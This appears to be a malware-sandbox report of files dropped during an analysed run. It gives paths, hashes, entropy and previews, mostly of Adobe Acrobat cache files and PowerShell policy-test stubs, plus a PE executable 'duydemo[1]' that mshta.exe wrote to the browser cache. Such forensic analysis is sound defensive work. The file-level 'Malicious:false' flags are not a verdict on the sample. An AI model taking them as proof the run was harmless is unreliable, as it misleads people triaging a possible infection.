                                                                                        SHA-512:2DF90D6DE0035EEFE71B7A514D01AD3F5EEC3D2EFFDC2DAE723833C256270B9F1864B0DEC70CFFA92494ADE2D9C3FDC2F9E6F4A3A22BE2C116BE20159D39ABF3
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.331757036828842
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfzdPeUkwRe9:YvXKXXggfsdTeOVcQzGb8Ukee9
                                                                                        MD5:4B3196305A0C3B342F80441430CBA4C6
                                                                                        SHA1:A38CF26418BA363E72A0D9826912EDB33F40AA90
                                                                                        SHA-256:448B726AE743F3AAD23B13724A889D53E12A7FC296E018536F41D5DDD730E393
                                                                                        SHA-512:0E7975C8C183856F29F100B8DE15BD7AF44BA2F7703C173C6346624E9C87A9AFE3BF47A84EE9D781F8F26B684B0B548BBB346D4F59A5FAD7F62D99051C9ADC78
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.312658082354993
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfYdPeUkwRe9:YvXKXXggfsdTeOVcQzGg8Ukee9
                                                                                        MD5:3857CBE6B95AC62F151D53439FDBDCFC
                                                                                        SHA1:9E4634956D8EADF83EEFA5C8B8432252B72D0123
                                                                                        SHA-256:52C44C2D4A5615FEFEC6D57573242F9D47EF3C73E60F905553CC53B47254DDE9
                                                                                        SHA-512:B6D438FDE52FB4A445C64213B34B2198427CCE8215ADBD941433AE9A468E78DA7D93B4F9885906E3C6004F06DBB28F61DE156D174E03904A08604B193B437ECD
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):284
                                                                                        Entropy (8bit):5.2992302996680944
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJf+dPeUkwRe9:YvXKXXggfsdTeOVcQzG28Ukee9
                                                                                        MD5:B7BAE08D9D827D517E9CA7D869572E8C
                                                                                        SHA1:FABEBEEF8C029BA9ED719EBC884B571DFB00D9D4
                                                                                        SHA-256:55E911AC4905C1C124C79115D40C6C15FFD6A2B5E1A6EEA33BCDB927DAEA19E8
                                                                                        SHA-512:01FF30057428A515C5CC327E86562E487898B6A8F41B4639DF9F2C0A5E9CB4B03F0E2387520DEF3FAC1BFFAFE17505DBD32A71D2C7AD7B2AE57EB00EEC34945A
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):5.296118182899268
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfbPtdPeUkwRe9:YvXKXXggfsdTeOVcQzGDV8Ukee9
                                                                                        MD5:4E4B3BC0235B8BBBBFF1356AAFDA7605
                                                                                        SHA1:DA70BEE1B32591E21965E42A09625C3DA240ACCF
                                                                                        SHA-256:32B00E23BBB3070DB0DF9070FB3DEE8E9E65CC0543A0EB15588BFC81FB0D6C58
                                                                                        SHA-512:7AEA99D84BEA683F78167DEE570A189B52E9B9AE751B220CCBA852D48945E0BBC676F52745A8B6C4C85D16C10E97E93F1C86A4B3BB511D2948691F67A06B0CA6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):287
                                                                                        Entropy (8bit):5.300944842298216
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJf21rPeUkwRe9:YvXKXXggfsdTeOVcQzG+16Ukee9
                                                                                        MD5:D02E6E2FE7857CDF57F346082EF5E52C
                                                                                        SHA1:6E8B7B626558B67A4CBF256E50E05F6CAC99AEA3
                                                                                        SHA-256:F5A965D54BFFFCE0EDBF39311A9782A3BFA24A0D7517D56CCD3A65A0F801CC22
                                                                                        SHA-512:D9C2F393BCA162F580948B902C1AF979DD99828775448B152F73D75085F02FE564DA4A844778C783335FF66C3B5ED5928B21C082D49165BE97641162BEF63D0F
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1090
                                                                                        Entropy (8bit):5.664604390380976
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XXtmeOVWamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSG:YvaIezBgkDMUJUAh8cvMG
                                                                                        MD5:3318D5CA6FB90D826A66D67D0908CE71
                                                                                        SHA1:C6DA5B46997375A033FA5A6426D36E690B27C37A
                                                                                        SHA-256:82B31790528F7391D1D9B484CA421B648FE1D0B58A6279A2C709906114E52B3A
                                                                                        SHA-512:1B03E0F50054F09BF5063C9BB7378E0B7DEAD9435504E91C8640F6366E4FA7BF769627B292B132B10CE198C17DEC3504956882F2120F2D464D44EFE1F52D9EB6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):286
                                                                                        Entropy (8bit):5.276630755733246
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfshHHrPeUkwRe9:YvXKXXggfsdTeOVcQzGUUUkee9
                                                                                        MD5:EFE965047820F42E70945EB27450A2C1
                                                                                        SHA1:3E95CA23B87C02D044F5C9AACC9CF9926395971E
                                                                                        SHA-256:0A616C1D2C29C5BAA56F57E0B8020016F4454BDDE646305B324D71D667123DB4
                                                                                        SHA-512:93244F03D215E806FAE3EC8F5BABCDBC0BB944661066052D96730CA9CE508DB7299D260F841808D7D6F37C161EFFEEF4E73680E57F619FD073891E82691DE345
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):282
                                                                                        Entropy (8bit):5.293706947682101
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJTqgFCrPeUkwRe9:YvXKXXggfsdTeOVcQzGTq16Ukee9
                                                                                        MD5:55941BED237DD326101FA78CBC24C89B
                                                                                        SHA1:704A0D6BDB2BA44D067FD051BB7E94EA7726A9D5
                                                                                        SHA-256:14A85C067C7CA1C0FFA5358C70508777B3A068F71BB3E4E62ED3C56130F187C4
                                                                                        SHA-512:2F29533F7A42F53B17B9724F27DC63BD429C7ED06A4E37DB2922E753931F9B2A19F307C14AE15959715BCEA3306C28E58E2C61580D7B3A8DB8413ACF2926BC43
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4
                                                                                        Entropy (8bit):0.8112781244591328
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:e:e
                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                        Malicious:false
                                                                                        Preview:....

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2814
                                                                                        Entropy (8bit):5.1467526352214
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YmEKGaoEayZtGJGBaBJTrKX6tsLK7lZKW21PjzKOj0SHfGeC2U/2LSHRCwKy58fI:YXN6QT06i9kDjDKo8evW9o3
                                                                                        MD5:C25690B3AB58D2784F3777FC90D450C3
                                                                                        SHA1:1D75F7BD5C7D18A042A22C7B8C2BFDF60870A5B6
                                                                                        SHA-256:AB2452EEE091E706CCF492406445416A7356A415DA289773B362F8F79891C23D
                                                                                        SHA-512:58D895047F26CD08793AA0349B5997BB4A1D8DF1D64F18215FC7E67D82C2A2224920486014D47A0200B5F71B18B12A7DA76115A64E5C5184932436A82AC56F1E
                                                                                        Malicious:false
                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"147bf335dbe421c5fd107f5137162081","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734551749000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"dec2e4f95859489a2435f71c6e749753","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734551749000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c9ba6b9fa7095b018c416000f4b24c85","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734551749000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"0baec62f55896459403f4b59ac14bdb1","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734551749000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"c0ea43d9f870bb6920dd9a57c56fedbe","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734551749000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"403e073ec789bd31236fb8fa68eb7aa9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                        Category:dropped
                                                                                        Size (bytes):12288
                                                                                        Entropy (8bit):1.4519051191448515
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsJZlbF:lNVmsw3SHtbDbPe0K3+fDZd8
                                                                                        MD5:4B49DFA03CFCE83894064E3194FE105D
                                                                                        SHA1:5B6D822989342C6BBD2613474C0AA7D0272823B2
                                                                                        SHA-256:5EF7FCB890980F260BE1B13B939F4664BAFF3DCAE8F1EDD2B2C34D9D11CB0550
                                                                                        SHA-512:671AD31A11D2AB77F3168CCA90881B3AD4EA45D989FB8D24672FF8CA9F07F0DDF75FF157FFBC604B499DFB0AAE07DA864FA1CDD748C80200108EC42E41C6765B
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):1.9542466298968424
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7MOrvrBd6dHtbGIbPe0K3+fDy2dsJsWqFl2GL7ms3:7j3SHtbDbPe0K3+fDZdOKVms3
                                                                                        MD5:4BBD6504E56B50E9350A910C68243CE3
                                                                                        SHA1:EFC2CC1462A72807A28055D17A113948C9F44481
                                                                                        SHA-256:0A9FC370FF4633A6BAAB8821EEC5B93A39829D59B31D0FAE116A96AB8671FD36
                                                                                        SHA-512:69C37089D075B3337A744A4C0AF05E08829437596CAEE07EF2D5A499F4EC6D5391780A45EB7D02201948D36902B9F5BFBB3AE12CF7E142B52D0B02DFC7C838BD
                                                                                        Malicious:false
                                                                                        Preview:.... .c.....9.e.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):66726
                                                                                        Entropy (8bit):5.392739213842091
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgOkxFVuH0X7ayKNzX32JXfG+wwrYyu:6a6TZ44ADEOkxP20XqNz29rK
                                                                                        MD5:C16F655111D93ED182122CB09AC81893
                                                                                        SHA1:E340BE79225E5B38B118F177093CAB714D7C056B
                                                                                        SHA-256:A101F805F02C66FCE2126AECE3E0DA6CD14B817D922D979FF0D934A8207B358B
                                                                                        SHA-512:04F82563C9FC09951EDEAB87AE9D91DF16CF30836A13BD776901DE15927075DA4283812FDB4215FB8FCE21C4963BC3441DC979A148B5C20018EF56FAD4FC97EA
                                                                                        Malicious:false
                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):76609
                                                                                        Entropy (8bit):4.923042039679657
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:fsnZcnsXsnZcnsEW3psnZcns8CsnZcns:EZcbZcA3KZcdZc
                                                                                        MD5:519C2DB854DB03CA32D2179DE50DC2B7
                                                                                        SHA1:94A3C9D4075DC8E809A8F39DF073EAF7AFFBFBAB
                                                                                        SHA-256:72C15EAE246F4FA60B0D4CEAA97029CA4691E56459BBE7C1348DC51488F9231F
                                                                                        SHA-512:4F1A9565710EA5DAA354B53C961E32140343A250B3E07AAFBBB3129810DD4A5378FB5C2F4D8538F661BF7590E07C20030BDE997FA21B911298F186950DE1D5DA
                                                                                        Malicious:false
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................

                                                                                        C:\Users\user\AppData\Local\Temp\MSI1d029.LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):246
                                                                                        Entropy (8bit):3.513199765407527
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDaR7QKw:Qw946cPbiOxDlbYnuRKSjH
                                                                                        MD5:EA5254FE2B0E151D87B6169109D76A97
                                                                                        SHA1:BE9776D58EB4384EA70EF251DAD09116C0841D78
                                                                                        SHA-256:2851568827869DD35CEA43721CE7A4FD2F42C6629081A4995C14B3D30AC9B98F
                                                                                        SHA-512:0CB12BF9577F6588B459DB8E62D0A5714AA4009240DD97B6D361FCA8EC38B80E5F3565EF5A657AB4C9B2D202E3E00EB59D01A9BD7B370B6D0A0681E9277C4918
                                                                                        Malicious:false
                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .1.4.:.5.5.:.4.5. .=.=.=.....

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5wj23t.asb.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kblsjzu.zi0.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqfe4ldr.ohw.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2mhrvyj.hal.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvqxrath.hyb.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

